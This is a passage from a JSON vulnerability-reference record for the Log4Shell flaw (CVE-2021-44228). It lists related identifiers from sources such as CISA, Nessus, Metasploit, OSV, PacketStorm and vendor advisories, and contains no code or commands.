"6CC386F9299ECFE5F62C9D0954CED9917B32A3DFEB8BC98C8212D83DD7B53DF6", "6DD517DD7F557A31BB9EF8B8E2970701E7EBF9E1168A77A02C5EFC57A29C1AE3", "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "6FBF074F8D8E8E6000FCF6488B84CA43AEFB7DEF10B2CEFF0E7D0AE1140ADA41", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "7156D43131599F71B03A8F8BDCE4755976A54F82BE32B0AEF105D1E6E781F384", "7295DCCE494A2CA195C0EC2BD4F052B62F3E1B45826D03ABBF986B81F58BDD31", "72E392728BCA627E900CA46B892A2B86465C877D468139416A39573D2D6C73F6", "73781BC7A0CCEF128DBC5E169F177E52BD5AD843F08787EBE0E19CC9088C2FA9", "745004E6A8DD36244AE3AE2E238FB3CA9F40B885C5F912CA9FBBD7A9FEE76248", "7473C0056DBBEF7C541ECDFB31E947DC1520282F5E0172B7C965A9DECA661856", "747C7023F8D283A88FE9778F37629C7BF2E2A7E5268A695905F9F28590BF76D3", "7566B2B0BD8AE66EDD74AA6296BA3C094CC3661C2B4C3EADB69127C0EBE5A710", "76FC3815A1052A74CFCD99C9C0F5C1F4FA7C289E70171A7BA16DE2B8E6DA736B", "77C0F01606E7883D65A2981E1E5DAEA1712E790E6D5528DDD17691C666E43D15", "78230A0FDE17E1A4791590999547D790CF1340A3123CA146452B6C92AF70CA24", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7A1D4AFC62D444E93951F6A46CA35876DD42680BFCB9DD562AE0F80A2C338D67", "7A36E54AFF586A013BFC64E0308098C6070D7FE82FD631B59758E4F661D42586", "7AA351B847C7732E8B7AE01A83A77CC863325C3B53A57FDDE54F4DF8D16D14C1", "7B60DE546B91D3886C995A5DE16291DEDDA95C96FC984BD69B852CF111B4C102", "7CE0B3947D8196985B00E6EB61ED45938560312360058DDC3063CF3D7BE03A81", "7D3ECDDF0FEF31AB10959BE94A3F76C4BE4F6CA1CC52373D0E460C5CA46E24A8", "7DDD006076946810EADC174FC2320565F527D46FFF5270A3D6916BF8993B12F9", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E2A7C8E981FCA78A12F6D8992BE35354D42B960D223A90BF210EE5B300BFB9E", "7E4FF868DFA0F4BDAEDFDEB60188A16AB82AC45AB8EB35F1D260229F12C10341", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "800A58A21DE4F630ECEAAA1932A596AE5A4743CB06907F342619D1D7ACD5AB64", "801604295C016952DB2E8049DC0524C86569A636C5BC867E0FB7565B433600F8", "818495FB1C54B71E6C7753464B1C7C2926402C76844055039753A11157B24B81", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "86B15422FEE58FE9F2F1B22520453D09FFA84C6049446DCE8467C766E3B57967", "870093D07F2D1BC6903F68758BFC9ABE9984CCE5FE2C013D13AC7FB645217C4D", "88119FF28113E384895FADEA63C7ABC2906571B02A874CF9D50260071AD58FB7", "887B058F572F29D81FDE73F26FFA89AE94C5B73C248CDC8EB74C172F09B39B6D", "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "893374FE903D82E10726F93A8E126C72248B18315149992024525319951E3097", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8A368F9B7240AEC7A45518B26EE613BFEF287DD9E106138A5AD63F4D494034D6", "8A9E980FE740F4424FB663C857EE84E39154A02964A02540A3A74E4A80F058EE", "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "8B49BD8B4756373645F1A1DA4BC3E31D1FE7BF1F5A0706A9665EE61D5A4B1419", "8C8A687167096A3D2AA73F94AC7D6F1C43EF830C110ED1F9406D92FAD9FCBA59", "8D4EDC587A369AADC2A4B4B6CA60C94602327216807E8B71042463A2BF381325", "8E3EC3A49910FD61ADB4E5FDC225B58A74D0BA57105F3D9A6F1B3E46361C1307", "8E5EB05CFB883D682B3A2C7D645375420476C4616183B915FE43ADDF8FA697A1", "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "924D425FFD71097B50917C124D87FAE558BFB3C7DAEF1BEA09CE12CCD6B264B3", "932EB6FF0C79CFA010373B06A99AA8906C2B3B3171A0D96A0399EF72EC35ED11", "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "94633A31471B22DF4D1E9508BA6DE360B6D37FAD329018F21926F838DAF45AB4", "964A048B00AF3D409A4AA83094E36431FA7631859A2D4595D2F53EE838A705E3", "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "976356D0F193356D662AC659E8578D3D0CC6C5711EA8A61D28A63CCA919F9900", "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9A6C0D3F4E9D02D3ABB77CC1F15B5C57FED8926916549AF207B111EC9D3C5B1C", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", "9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9BFFF73DB09075877DB19A13994A90F7D1CF13A8A5601B84DC0B84F8193E65C1", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A15B390D080295157749FA22EBE90BAA7A33E1EC803752A1824ADBE8D7353A10", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AF14D81F9945B81EA39B6923FB2CB4E62949A34EE9CCFEF7120D6D6700FA48A1", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCE74B609685420B52F0CE6D14ACF26F43DB5C6A64A19034DCD1E9CB0CA2BE72", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D156BD5A77A183961676EA2393F58C31A72725CEC216EB199E31487998BE491C", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F2901ADEFFDC496A6F27CBD82624C55C4B805D9C77EBED14A24ED2CCC730C354", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["AA21-356A", "AA22-117A", "AA22-152A", "AA22-174A", "AA22-257A", "AA22-279A", "AA22-320A", "AA23-040A", "ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0009F92C7DBF6D1163E64AF402687506", "IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6411625084720414057", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:866017936175971203", "KITPLOIT:8945091038325456871"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:2B7FA24A43BE3D53EA1E393BEC594625", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:A40F87C53D5487E9D81FB6A8F62AF633", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_CORE_LOG4SHELL-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-"]}, {"type": "mmpc", "idList": ["MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:F36351D1B5A5C40989F46EF8729039A7"]}, {"type": "mscve", "idList": ["MS:CVE-2021-44228"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B", "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "MSRC:C6213215CC0BE4847F142F730607AFA2"]}, {"type": "mssecure", "idList": ["MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:F36351D1B5A5C40989F46EF8729039A7"]}, {"type": "nessus", "idList": ["AL2022_ALAS2022-2022-225.NASL", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2022-1276.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "GENTOO_GLSA-202209-02.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOS_SPLUNK_824.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "NUTANIX_NXSA-AOS-5_20_4.NASL", "NUTANIX_NXSA-AOS-6_0_2_5.NASL", "NUTANIX_NXSA-AOS-6_1.NASL", "NUTANIX_NXSA-AOS-6_1_1.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SAP_NETWEAVER_AS_3123396.NASL", "SAP_NETWEAVER_AS_JAVA_3123427.NASL", "SOLR_CVE-2021-44228.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022", "ORACLE:CPUJAN2023", "ORACLE:CPUOCT2022"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167917", "PACKETSTORM:170178"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:0EAB7251347951045CAC549194E33673", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", 